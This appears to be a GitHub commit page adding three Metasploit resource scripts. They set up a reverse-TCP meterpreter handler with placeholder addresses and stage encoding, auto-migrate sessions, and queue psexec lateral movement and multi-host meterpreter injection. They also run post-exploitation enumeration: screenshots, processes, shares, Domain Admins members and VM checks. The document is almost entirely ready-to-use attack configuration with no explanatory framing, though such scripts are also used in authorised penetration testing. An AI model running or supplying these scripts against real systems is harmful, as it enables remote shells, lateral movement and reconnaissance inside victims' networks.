Skip to content

Commit 9688497

Browse files
bluscreenofjeffbluscreenofjeff
authored andcommitted
migrated scripts from old repo
1 parent d176277 commit 9688497

File tree

3 files changed

+38
-0
lines changed

3 files changed

+38
-0
lines changed

bounce.rc

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
use multi/handler
2+
set payload windows/meterpreter/reverse_tcp
3+
set lhost X.X.X.X
4+
set lport YYY
5+
set exitonsession false
6+
set enablestageencoding true
7+
set autorunscript migrate -f
8+
jobs -K
9+
exploit -j -z
10+
use exploit/windows/smb/psexec

infogather.rc

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
run migrate -f
2+
screenshot -v false
3+
ps
4+
ipconfig
5+
sysinfo
6+
run post/windows/gather/enum_shares
7+
run post/windows/gather/enum_domain_group_users group="Domain Admins"
8+
run post/windows/gather/checkvm
9+
screenshot -v false
10+
background

msfconsole.rc

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
spool /mylog.log
2+
set consolelogging true
3+
set loglevel 5
4+
set sessionlogging true
5+
set timestampoutput true
6+
set prompt %T S:%S J:%J
7+
use exploit/multi/handler
8+
set payload windows/meterpreter/reverse_tcp
9+
set lhost X.X.X.X
10+
set lport YYY
11+
set exitonsession false
12+
set enablestageencoding true
13+
set autorunscript multi_console_command.rb -rc /autosploit
14+
exploit -j -z
15+
use post/windows/manage/multi_meterpreter_inject
16+
set iplist X.X.X.X;X.X.X.X
17+
set lport YYY
18+
jobs

0 commit comments

Comments
 (0)